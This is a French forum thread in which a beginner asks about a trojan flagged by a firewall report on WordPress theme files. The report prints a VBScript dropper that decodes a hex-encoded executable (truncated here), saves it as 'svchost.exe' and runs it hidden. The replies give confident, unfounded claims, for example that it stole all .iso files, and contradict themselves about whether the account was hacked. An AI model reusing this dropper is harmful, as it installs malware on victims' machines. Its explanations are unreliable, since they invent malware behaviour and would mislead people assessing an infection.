Demande de renseignement concernant ce virus (VBS:Agent-KZ [Trj)

Fermé
ini-idf Messages postés 30 Date d'inscription samedi 7 juillet 2012 Statut Membre Dernière intervention 7 novembre 2012 - Modifié par ini-idf le 19/10/2012 à 23:32
pika3d Messages postés 329 Date d'inscription dimanche 15 juillet 2012 Statut Membre Dernière intervention 22 novembre 2014 - 22 oct. 2012 à 18:48
Bonjour,


connaissez vous ce virus ?
j'ai fais des recherches sur google et je n'ai trouvé que ce raport de ninjafirewall



TYPE VBS:Agent-KZ [Trj]

TARGET WordPress

WHERE Theme PHP files

VULNERABILITY Stolen WordPress admin password

MALWARE_DOMAIN -

MALWARE_URI -

MALWARE_RAW_CODE <SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData =
""4D5A90000300000004000000FFFF0000B800000000000000
40000000000000000000000000000000000000000000000000
0000000000000000000000E80000000E1FBA0E00B409CD21B8
014CCD21546869732070726F6772616D2063616E6E6F742062
652072756E20696E20444F53206D6F64652E0D0D0A24000000
00000000D72D862D934CE87E934CE87E934CE87E8F03B77E91
4CE87E9C74887ED34DE87EC644B37E8E4CE
....
...
57B07EF1F88B202CF336A7E2AAD03C758F9B4C9B6E359551E8
24385097486ECAB861A7CF973E04FEA1C801E57B9423B0DC10
EDB8F02C5BA8065695394C18C5FE5EC07126964F172BC1C6A5
29C980082863EAD561FC240F63C205FB5D51146C8491F9AB72
B5E4CA0B32ADED3661B8A65A1F81A38EFF264A728B112E7FD7
91432B8C08A91B1B0527307A6015AD9826ED64B9919AB0920D
68A4A299F8867559579CB27CE685FE2"
Set FSO =
CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" &
DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" &
Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
A voir également:

3 réponses

pika3d Messages postés 329 Date d'inscription dimanche 15 juillet 2012 Statut Membre Dernière intervention 22 novembre 2014 40
19 oct. 2012 à 23:49
On sait que c'est un trojan (cheval de troie) grâce à l'abrév. [Trj]. On sait aussi qu'il a volé un mot de passe administrateur de WordPress (grand site créateur de blogs) et aussi qu'il a faussé tous les fichiers .iso détectés.

Si tu t'es pris ce virus il est pas hyper-dangereux.
0
ini-idf Messages postés 30 Date d'inscription samedi 7 juillet 2012 Statut Membre Dernière intervention 7 novembre 2012 6
Modifié par ini-idf le 20/10/2012 à 00:04
merci de m'avoir répondu si rapidement ..

est ce que c'est un virus qui s'ataque specialement aux blogs wordpress ou c'est juste dans ce cas de figure qu'il est question de wordpress ?

et tu veux bien devloper un peu plus concernant ( il a faussé tous les fichiers .iso détectés )

j'essaie de comprendre je suis debutant :(

je ne me suis pas pris ce virus heureusement avast la bloqué .
0
pika3d Messages postés 329 Date d'inscription dimanche 15 juillet 2012 Statut Membre Dernière intervention 22 novembre 2014 40
21 oct. 2012 à 18:33
De rien !

Alors en fait je ne connais pas ce virus en particulier, donc je ne pourrai pas te dire s'il est conçu pour dérober des passswords de WordPress, mais en tout cas si tu avais un compte WP, il a été piraté.

Sinon, il a faussé les fichiers .iso, ça veut dire qu'il a récupéré les données de tous les .iso que le trojan a découvert, et qu'il les a envoyées au créateur du virus.

Mais sinon pourquoi essayer de comprendre un virus que tu ne t'es pas pris ? C'est important si le virus t'a infecté, pas si tu l'as bloqué ;)

Allez, salut !
0
ini-idf Messages postés 30 Date d'inscription samedi 7 juillet 2012 Statut Membre Dernière intervention 7 novembre 2012 6
Modifié par ini-idf le 22/10/2012 à 13:57
mon compte wordpresse a eté piraté meme si le virus a eté bloqué par avast ???
0
ini-idf Messages postés 30 Date d'inscription samedi 7 juillet 2012 Statut Membre Dernière intervention 7 novembre 2012 6
22 oct. 2012 à 13:56
ce virus se trouvait dans un fichier qu'une personne ma filé .....
c'est pour ca que j'essaie de comprendre le comment du pourquoi ;)
0
pika3d Messages postés 329 Date d'inscription dimanche 15 juillet 2012 Statut Membre Dernière intervention 22 novembre 2014 40
22 oct. 2012 à 18:48
>> Non, ton compte WP n'a pas été piraté si ton antivirus l'a bloqué ;)

>> En tout cas la personne qui t'as remis ce fichier va se faire [...] =)
0
pika3d Messages postés 329 Date d'inscription dimanche 15 juillet 2012 Statut Membre Dernière intervention 22 novembre 2014 40
21 oct. 2012 à 18:38
PS : En fait, j'en suis certain, ce virus a été conçu pour dérober les mots de passe WordPress.

En ré-analysant bien le code j'ai vu "TARGET : WordPress" (Target = Cible en anglais).

On en déduit que la cible de ce virus était bien WordPress. D'ailleurs, la ligne "VULNERABILITY Stolen WordPress admin password" dit tout... (Vulnérabilité : Mot de passe administrateur de WordPress volé)
0
ini-idf Messages postés 30 Date d'inscription samedi 7 juillet 2012 Statut Membre Dernière intervention 7 novembre 2012 6
22 oct. 2012 à 13:53
Merci pour ces renseignements précieux
0
pika3d Messages postés 329 Date d'inscription dimanche 15 juillet 2012 Statut Membre Dernière intervention 22 novembre 2014 40
22 oct. 2012 à 18:48
De rien !
0